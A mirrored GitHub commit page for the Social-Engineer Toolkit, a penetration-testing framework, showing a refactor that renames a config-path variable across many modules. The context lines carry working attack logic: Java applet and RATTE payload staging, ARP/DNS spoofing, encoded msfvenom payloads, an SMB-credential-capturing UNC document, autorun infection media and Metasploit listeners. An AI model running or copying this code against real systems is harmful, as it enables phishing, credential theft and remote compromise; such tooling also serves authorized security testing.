Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-11-22 20:43:04 +00:00
Code Issues Projects Releases Packages Wiki Activity

Merge pull request #507 from IonoclastBrigham/path-fixes

Browse source 
Path fixes
This commit is contained in:
trustedsec 2018-02-22 13:34:30 -05:00 committed by GitHub
commit 0ca44a6437
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
42 changed files with 750 additions and 723 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
modules/ratte_module.py
View file

@ -35,7 +35,7 @@ except NameError:
pass pass
definepath = os.getcwd() definepath = os.getcwd()
setdir = core.setdir() userconfigpath = core.userconfigpath
MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first" MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"
@ -100,10 +100,10 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
############################################ ############################################
# this part is needed to rename the msf.exe file to a randomly generated one # this part is needed to rename the msf.exe file to a randomly generated one
if os.path.isfile(os.path.join(setdir, "/rand_gen")): if os.path.isfile(os.path.join(userconfigpath, "rand_gen")):
# open the file # open the file
# start a loop # start a loop
with open(os.path.join(setdir, "rand_gen")) as fileopen: with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:
for line in fileopen: for line in fileopen:
# define executable name and rename it # define executable name and rename it
filename = line.rstrip() filename = line.rstrip()
@ -111,7 +111,7 @@ def java_applet_attack_tw(website, port, directory, ipaddr):
subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait() subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait()
# lastly we need to copy over the signed applet # lastly we need to copy over the signed applet
subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait() subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()
# TODO index.html parsen und IPADDR:Port ersetzen # TODO index.html parsen und IPADDR:Port ersetzen
with open(os.path.join(directory, "index.html"), "rb") as fileopen: with open(os.path.join(directory, "index.html"), "rb") as fileopen:
@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
############ ############
# PATCH Server IP into RATTE # PATCH Server IP into RATTE
############ ############
with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite: with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite:
host = (len(ipaddr) + 1) * "X" host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y" r_port = (len(str(ratteport)) + 1) * "Y"
@ -271,10 +271,10 @@ def main():
core.print_info("Starting java applet attack...") core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr) java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen: with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen: for line in fileopen:
ratte_random = line.rstrip() ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait() subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
####################### #######################
# start ratteserver # start ratteserver

4
modules/ratte_only_module.py
View file

@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
############ ############
# PATCH Server IP into RATTE # PATCH Server IP into RATTE
############ ############
with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite: with open(os.path.join(core.userconfigpath, "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X" host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y" r_port = (len(str(ratteport)) + 1) * "Y"
@ -126,7 +126,7 @@ def main():
############ ############
prepare_ratte(ipaddr, ratteport, persistent, customexe) prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe")) core.print_status("Payload has been exported to %s" % os.path.join(core.userconfigpath, "ratteM.exe"))
################### ###################
# start ratteserver # start ratteserver

2
seproxy
View file

@ -45,7 +45,7 @@ if operating_system == "posix":
else: else:
proxy_string = "export http_proxy='http://{0}'".format(proxy) proxy_string = "export http_proxy='http://{0}'".format(proxy)
with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite:
filewrite.write(proxy_string) filewrite.write(proxy_string)
def kill_proc(port, flag): def kill_proc(port, flag):

21
setoolkit
View file

@ -51,8 +51,9 @@ import src.core.setcore as core
from src.core.menu import text from src.core.menu import text
from src.core.update_config import update_config from src.core.update_config import update_config
if os.path.isfile(os.path.join(core.setdir, "version.lock")):
os.remove(os.path.join(core.setdir, "version.lock")) if os.path.isfile(os.path.join(core.userconfigpath, "version.lock")):
os.remove(os.path.join(core.userconfigpath, "version.lock"))
# check directory and make it # check directory and make it
if not os.path.isdir("src/logs/"): if not os.path.isdir("src/logs/"):
@ -69,16 +70,16 @@ operating_system = core.check_os()
# use ~/.set # use ~/.set
if operating_system == "posix": if operating_system == "posix":
if not os.path.isdir(core.setdir): if not os.path.isdir(core.userconfigpath):
# create the set variables # create the set variables
os.makedirs(core.setdir) os.makedirs(core.userconfigpath)
# if for some reason it failed to pull the path # if for some reason it failed to pull the path
userdir = os.path.join(os.path.expanduser('~'), '.set') userdir = os.path.join(os.path.expanduser('~'), '.set')
if not os.path.isdir(userdir): if not os.path.isdir(userdir):
os.makedirs(userdir) os.makedirs(userdir)
if not os.path.isdir(os.path.join(core.setdir, "reports")): if not os.path.isdir(os.path.join(core.userconfigpath, "reports")):
os.makedirs(os.path.join(core.setdir, "reports")) os.makedirs(os.path.join(core.userconfigpath, "reports"))
# check to see if we have python-pycrypto # check to see if we have python-pycrypto
try: try:
@ -115,7 +116,7 @@ if dns.lower() == "on":
core.start_dns() core.start_dns()
# remove old files # remove old files
for root, dirs, files in os.walk(core.setdir): for root, dirs, files in os.walk(core.userconfigpath):
for f in files: for f in files:
try: try:
match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f) match = re.search(".svn|entries|all-wcprops|props|text-base|prop-base|tmp", f)
@ -154,13 +155,13 @@ define_version = core.get_version()
core.cleanup_routine() core.cleanup_routine()
# create the set.options routine # create the set.options routine
with open(os.path.join(core.setdir, "/set.options"), "w") as filewrite: with open(os.path.join(core.userconfigpath, "set.options"), "w") as filewrite:
filewrite.write("{This is the main SET configuration file for all options used in SET}\n") filewrite.write("{This is the main SET configuration file for all options used in SET}\n")
try: try:
# Remove old Signed_Updates # Remove old Signed_Updates
if os.path.isfile(os.path.join(core.setdir, "/Signed_Update.jar")): if os.path.isfile(os.path.join(core.userconfigpath, "Signed_Update.jar")):
os.remove(os.path.join(core.setdir, "/Signed_Update.jar")) os.remove(os.path.join(core.userconfigpath, "Signed_Update.jar"))
# initial user menu # initial user menu
if not os.path.isfile("src/agreement4"): if not os.path.isfile("src/agreement4"):

182
setup.py
View file

@ -3,89 +3,115 @@
# #
# Python installer # Python installer
# #
import subprocess
import sys
import os import os
import platform import platform
import shutil
import subprocess
import sys
# if nix then run installer
if platform.system() == "Linux":
# give installer a null value
installer = False
# Check user ID ## pre-install sanity checks ##
if os.getuid() != 0:
print("Are you root? Please execute as root") # if our command option is true then install stuff
exit() if len(sys.argv) != 2 or sys.argv[1] != "install":
print("** SET Installer **")
print("** Written by: Dave Kennedy (ReL1K) **")
print("** Visit: https://www.trustedsec.com **")
print("\nTo install, run: `# setup.py install'")
exit()
platformOS = platform.system()
if platformOS not in ["Linux", "Darwin"]:
print("[!] Sorry this installer is not designed for %s (only Linux and Mac)"
". Please install the Python dependencies manually." % platformOS)
exit()
# Check user ID
if os.getuid() != 0:
print("** SET Installer **")
print("[!] Please execute as root: `$ sudo python setup.py install'")
exit()
## SET installation ##
# do install of SET itself
def install(prefix):
destdir = "%s/share/setoolkit" % prefix
bindir = "%s/bin" % prefix
print("[*] Copying setoolkit into the %s directory..." % destdir)
subprocess.Popen("cp -rf . %s" % destdir, shell=True).wait()
print("[*] Installing setoolkit runner to %s..." % bindir)
subprocess.Popen("echo \#!/bin/bash > %s/setoolkit" % bindir, shell=True).wait()
subprocess.Popen("echo cd {0} >> {1}/setoolkit".format(destdir, bindir), shell=True).wait()
subprocess.Popen("echo exec python setoolkit $@ >> %s/setoolkit" % bindir, shell=True).wait()
subprocess.Popen("chmod +x %s/setoolkit" % bindir, shell=True).wait()
print("[*] Installing setoolkit updater to %s..." % bindir)
subprocess.Popen("cp {0}/seupdate {1}/".format(destdir, bindir), shell=True).wait()
subprocess.Popen("chmod +x %s/seupdate" % bindir, shell=True).wait()
if not os.path.isdir("/etc/setoolkit/"):
print("[*] Creating setoolkit config dir /etc/setoolkit./..")
os.makedirs("/etc/setoolkit/")
if not os.path.isfile("/etc/setoolkit/set.config"):
print("[*] Installing default setoolkit config to /etc/setoolkit./..")
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
print("[*] We are now finished! To run SET, type `setoolkit'...")
# if linux then run installer
if platformOS == "Linux":
print("[*] Installing dependencies...")
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen("apt-get -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://github.com/erocarrera/pefile/archive/master.zip", shell=True).wait()
subprocess.Popen("unzip master.zip", shell=True).wait()
subprocess.Popen("chmod a+x pefile-master/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-master*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
elif os.path.isfile("/etc/dnf/dnf.conf"):
subprocess.Popen("dnf -y install git python-pexpect python-pefile python-crypto pyOpenSSL", shell=True).wait()
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
print("[-] Install failed. GIT is not installed. SET will not continue.")
print("[!] Install GIT and run the installer again.")
sys.exit()
try: try:
# if our command option is true then install stuff install(prefix="/usr")
if sys.argv[1] == "install": except Exception as e:
installer = True print("[!] Error installing setoolkit", e)
# if index is out of range then flag options if platformOS == 'Darwin':
except IndexError: print("[*] Installing dependencies...")
print("** SET Dependency Installer **")
print("** Written by: Dave Kennedy (ReL1K) **")
print("** Visit: https://www.trustedsec.com **")
print("\nTo install: setup.py install")
# if user specified install then lets to the installation
if installer is True:
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
subprocess.Popen("apt-get -y install "
"git apache2 python-requests libapache2-mod-php "
"python-pymssql build-essential python-pexpect "
"python-pefile python-crypto python-openssl", shell=True).wait()
# If pacman.conf exists, we have a Arch based system
elif os.path.isfile("/etc/pacman.conf"):
subprocess.Popen("pacman -S --noconfirm --needed git python2 "
"python2-beautifulsoup3 python2-pexpect python2-crypto", shell=True).wait()
subprocess.Popen("wget https://github.com/erocarrera/pefile/archive/master.zip", shell=True).wait()
subprocess.Popen("unzip master.zip", shell=True).wait()
subprocess.Popen("chmod a+x pefile-master/setup.py", shell=True).wait()
subprocess.Popen("rm -rf pefile-master*", shell=True).wait()
# if dnf.conf is there, we are dealing with a >= fedora 22 - added thanks to whoismath pr
elif os.path.isfile("/etc/dnf/dnf.conf"):
subprocess.Popen("dnf -y install git python-pexpect python-pefile python-crypto pyOpenSSL", shell=True).wait()
# if sources.list or pacman.conf is not available then we're running
# something offset
else:
print("[!] You're not running a Debian, Fedora or Arch variant. Installer not finished for this type of Linux distro.")
print("[!] Install git, python-pexpect, python-crypto, python-openssl, python-pefile manually for all of SET dependancies.")
sys.exit()
if os.path.isdir("/usr/share/setoolkit"):
print("[!] SET is already installed in /usr/share/setoolkit. Remove and start again.")
sys.exit()
if not os.path.isfile("/usr/bin/git"):
print("[-] Install failed. GIT is not installed. SET will not continue.")
print("[!] Install GIT and run the installer again.")
sys.exit()
print("[*] Copying SET into the /usr/share/setoolkit directory...")
cwdpath = os.getcwd()
subprocess.Popen("cd ..;cp -rf %s /usr/share/setoolkit" % cwdpath, shell=True).wait()
print("[*] Installing setoolkit installer to /usr/bin/setoolkit...")
subprocess.Popen("echo #!/bin/bash > /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo cd /usr/share/setoolkit >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("echo exec python2 setoolkit $@ >> /usr/bin/setoolkit", shell=True).wait()
subprocess.Popen("cp /usr/share/setoolkit/seupdate /usr/bin/", shell=True).wait()
subprocess.Popen("chmod +x /usr/bin/setoolkit", shell=True).wait()
print("[*] We are now finished! To run SET, type setoolkit...")
if platform.system() == 'Darwin':
subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait() subprocess.Popen("easy_install pexpect pycrypto pyopenssl pefile", shell=True).wait()
try:
if platform.system() not in ["Linux", "Darwin"]: install(prefix="/usr/local")
print("[!] Sorry this installer is not designed for any other system other " except Exception as e:
"than Linux and Mac. Please install the Python dependencies manually.") print("[!] Error installing setoolkit", e)

20
src/autorun/autolaunch.py
View file

@ -12,7 +12,7 @@ import src.core.setcore as core
definepath = os.getcwd() definepath = os.getcwd()
msf_path = core.meta_path() msf_path = core.meta_path()
me = core.mod_name() me = core.mod_name()
autorun_path = os.path.join(core.setdir, "autorun") autorun_path = os.path.join(core.userconfigpath, "autorun")
trigger = 0 trigger = 0
@ -21,23 +21,23 @@ if core.check_options("INFECTION_MEDIA=") == "ON":
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path, "cp {1} {2} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "payload.exe"), os.path.join(core.userconfigpath, "payload.exe"),
os.path.join(autorun_path, "program.exe")), os.path.join(autorun_path, "program.exe")),
shell=True).wait() shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "fileformat.file")): if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")):
trigger = 2 trigger = 2
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path, "cp {1} {0} 1> /dev/null 2>/dev/null".format(autorun_path,
os.path.join(core.setdir, "template.pdf")), os.path.join(core.userconfigpath, "template.pdf")),
shell=True).wait() shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "/dll/openthis.wab")): if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")):
subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;"
"mkdir {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;"
"cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path, "cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path,
os.path.join(core.setdir, "/dll/*")), os.path.join(core.userconfigpath, "dll/*")),
shell=True).wait() shell=True).wait()
trigger = 3 trigger = 3
@ -71,9 +71,9 @@ if trigger in [1, 2, 3]:
if choice1.lower() == "yes" or choice1.lower() == "y": if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the # if we used something to create other than solo.py then write out the
# listener # listener
if not os.path.isfile(os.path.join(core.setdir, "meta_config")): if not os.path.isfile(os.path.join(core.userconfigpath, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \ with open(os.path.join(core.userconfigpath, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen: open(os.path.join(core.userconfigpath, "payload.options")) as fileopen:
for line in fileopen: for line in fileopen:
line = line.split(" ") line = line.split(" ")
filewrite.write("use multi/handler\n") filewrite.write("use multi/handler\n")
@ -86,7 +86,7 @@ if trigger in [1, 2, 3]:
# create the listener # create the listener
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..") core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")), os.path.join(core.userconfigpath, "meta_config")),
shell=True).wait() shell=True).wait()
else: else:
core.print_warning("cancelling...") core.print_warning("cancelling...")

10
src/core/arp_cache/arp.py
View file

@ -105,7 +105,7 @@ if ettercapchoice == 'y':
# spawn a child process # spawn a child process
os.chdir(cwd) os.chdir(cwd)
time.sleep(5) time.sleep(5)
filewrite = open(setdir + "/ettercap", "w") filewrite = open(userconfigpath + "ettercap", "w")
filewrite.write( filewrite.write(
"ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge)) "ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge))
filewrite.close() filewrite.close()
@ -147,8 +147,8 @@ if dsniffchoice == 'y':
if dns_spoof == "": if dns_spoof == "":
dns_spoof = "*" dns_spoof = "*"
subprocess.Popen( subprocess.Popen(
"rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (setdir), shell=True).wait() "rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait()
filewrite = open(setdir + "/dnsspoof.conf", "w") filewrite = open(userconfigpath + "dnsspoof.conf", "w")
filewrite.write("%s %s" % (ipaddr, dns_spoof)) filewrite.write("%s %s" % (ipaddr, dns_spoof))
filewrite.close() filewrite.close()
print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!") print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!")
@ -160,10 +160,10 @@ if dsniffchoice == 'y':
gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % ( gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % (
interface), shell=True, stdout=subprocess.PIPE).communicate()[0] interface), shell=True, stdout=subprocess.PIPE).communicate()[0]
# open file for writing # open file for writing
filewrite = open(setdir + "/ettercap", "w") filewrite = open(userconfigpath + "ettercap", "w")
# write the arpspoof / dnsspoof commands to file # write the arpspoof / dnsspoof commands to file
filewrite.write( filewrite.write(
"arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, setdir)) "arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath))
# close the file # close the file
filewrite.close() filewrite.close()
# change back to normal directory # change back to normal directory

6
src/core/fasttrack.py
View file

@ -263,7 +263,7 @@ try:
# specify we are using the fasttrack # specify we are using the fasttrack
# option, this disables some features # option, this disables some features
filewrite = open( filewrite = open(
setdir + "/fasttrack.options", "w") userconfigpath + "fasttrack.options", "w")
filewrite.write("none") filewrite.write("none")
filewrite.close() filewrite.close()
# import fasttrack # import fasttrack
@ -439,10 +439,10 @@ try:
# if we are using the built in one # if we are using the built in one
if dict == "": if dict == "":
# write out a file # write out a file
filewrite = open(setdir + "/dictionary.txt", "w") filewrite = open(userconfigpath + "dictionary.txt", "w")
filewrite.write("\nPassword1\nPassword!\nlc username") filewrite.write("\nPassword1\nPassword!\nlc username")
# specify the path # specify the path
dict = setdir + "/dictionary.txt" dict = userconfigpath + "dictionary.txt"
filewrite.close() filewrite.close()
# if we are not brute forcing # if we are not brute forcing

48
src/core/msf_attacks/create_payload.py
View file

@ -196,20 +196,20 @@ if exploit_counter == 0:
print_info("Generating fileformat exploit...") print_info("Generating fileformat exploit...")
# START THE EXE TO VBA PAYLOAD # START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload': if exploit != 'custom/exe/to/vba/payload':
output = setdir + "/%s" % (outfile) output = userconfigpath + "%s" % (outfile)
if os.path.isfile(setdir + "/template.pdf"): if os.path.isfile(userconfigpath + "template.pdf"):
os.remove(setdir + "/template.pdf") os.remove(userconfigpath + "template.pdf")
if os.path.isfile(msfpath + "local/template.pdf"): if os.path.isfile(msfpath + "local/template.pdf"):
os.remove(msfpath + "local/template.pdf") os.remove(msfpath + "local/template.pdf")
if inputpdf != "": inputpdf = ("set INFILENAME " + inputpdf + "\n") if inputpdf != "": inputpdf = ("set INFILENAME " + inputpdf + "\n")
output = output.replace("//", "/") output = output.replace("//", "/")
filewrite = open(setdir + "/template.rc", "w") filewrite = open(userconfigpath + "template.rc", "w")
filewrite.write("use %s\nset LHOST %s\nset LPORT %s\n%sset FILENAME %s\nexploit\n" % filewrite.write("use %s\nset LHOST %s\nset LPORT %s\n%sset FILENAME %s\nexploit\n" %
(exploit, rhost, lport, inputpdf, output)) (exploit, rhost, lport, inputpdf, output))
filewrite.close() filewrite.close()
child = pexpect.spawn( child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, setdir)) "%smsfconsole -r %s/template.rc" % (meta_path, userconfigpath))
a = 1 a = 1
counter = 0 counter = 0
while a == 1: while a == 1:
@ -219,15 +219,15 @@ if exploit_counter == 0:
print_error("You will need to troubleshoot Metasploit manually and try generating a PDF. You can manually troubleshoot by going to /root/.set/ and typing msfconsole -r template.rc to reproduce the issue.") print_error("You will need to troubleshoot Metasploit manually and try generating a PDF. You can manually troubleshoot by going to /root/.set/ and typing msfconsole -r template.rc to reproduce the issue.")
pause = raw_input("Press {return} to move back.") pause = raw_input("Press {return} to move back.")
break break
if os.path.isfile(setdir + "/" + outfile): if os.path.isfile(userconfigpath + "" + outfile):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, userconfigpath),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True) stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break a = 2 # break
else: else:
print_status("Waiting for payload generation to complete (be patient, takes a bit)...") print_status("Waiting for payload generation to complete (be patient, takes a bit)...")
if os.path.isfile(msfpath + "local/" + outfile): if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" % subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, setdir), shell=True) (msfpath, outfile, userconfigpath), shell=True)
counter = counter + 1 counter = counter + 1
time.sleep(3) time.sleep(3)
@ -244,23 +244,23 @@ if exploit_counter == 0:
execute1 = ("exe") execute1 = ("exe")
payloadname = ("vb.exe") payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True) (meta_path, payload, rhost, lport, execute1, userconfigpath, payloadname), shell=True)
if noencode == 0: if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, setdir, setdir), shell=True) (meta_path, userconfigpath, userconfigpath), shell=True)
# Create the VB script here # Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, setdir, setdir), shell=True) (meta_path, userconfigpath, userconfigpath), shell=True)
print_info("Raring the VBS file.") print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(setdir, setdir), shell=True) (userconfigpath, userconfigpath), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER # NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite = open(setdir + "/payload.options", "w") filewrite = open(userconfigpath + "payload.options", "w")
filewrite.write(payload + " " + rhost + " " + lport) filewrite.write(payload + " " + rhost + " " + lport)
filewrite.close() filewrite.close()
if exploit != "dll_hijacking": if exploit != "dll_hijacking":
if not os.path.isfile(setdir + "/fileformat.file"): if not os.path.isfile(userconfigpath + "fileformat.file"):
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: try:
@ -279,11 +279,11 @@ if exploit == "unc_embed":
letters = string.ascii_letters + string.digits letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)]) return ''.join([random.choice(letters) for _ in range(length)])
rand_gen = random_string() rand_gen = random_string()
filewrite = open(setdir + "/unc_config", "w") filewrite = open(userconfigpath + "unc_config", "w")
filewrite.write("use server/capture/smb\n") filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n") filewrite.write("exploit -j\r\n\r\n")
filewrite.close() filewrite.close()
filewrite = open(setdir + "/template.doc", "w") filewrite = open(userconfigpath + "template.doc", "w")
filewrite.write( filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen)) r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close() filewrite.close()
@ -312,16 +312,16 @@ if exploit == "dll_hijacking":
# if we are not using apache # if we are not using apache
if apache == 0: if apache == 0:
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open(setdir + "/attack_vector", "w") filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("hijacking") filewrite.write("hijacking")
filewrite.close() filewrite.close()
filewrite = open(setdir + "/site.template", "w") filewrite = open(userconfigpath + "site.template", "w")
filewrite.write("TEMPLATE=CUSTOM") filewrite.write("TEMPLATE=CUSTOM")
filewrite.close() filewrite.close()
time.sleep(1) time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % ( subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python src/html/web_server.py") child = pexpect.spawn("python src/html/web_server.py")
# if we are using apache # if we are using apache
@ -329,13 +329,13 @@ if exploit == "dll_hijacking":
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait() (apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"): if os.path.isfile(userconfigpath + "meta_config"):
# if we aren't using the infectious method then do normal routine # if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
print_info("This may take a few to load MSF...") print_info("This may take a few to load MSF...")
try: try:
child1 = pexpect.spawn( child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir)) "%smsfconsole -L -r %s/meta_config" % (meta_path, userconfigpath))
except: except:
try: try:
child1.close() child1.close()
@ -344,7 +344,7 @@ if exploit == "dll_hijacking":
# get the emails out # get the emails out
# if we aren't using the infectious method then do the normal routine # if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)): if not os.path.isfile("%s/fileformat.file" % (userconfigpath)):
sys.path.append("src/phishing/smtp/client/") sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1) debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try: try:

126
src/core/payloadgen/create_payloads.py
View file

@ -53,27 +53,27 @@ attack_vector = 0
linosx = 0 linosx = 0
multiattack = "" multiattack = ""
# grab attack vector # grab attack vector
if os.path.isfile(setdir + "/attack_vector"): if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(setdir + "/attack_vector", "r") fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen: for line in fileopen:
line = line.rstrip() line = line.rstrip()
if line == "java": if line == "java":
attack_vector = "java" attack_vector = "java"
if line == "multiattack": if line == "multiattack":
attack_vector = "multiattack" attack_vector = "multiattack"
multiattack = open(setdir + "/multi_payload", "w") multiattack = open(userconfigpath + "multi_payload", "w")
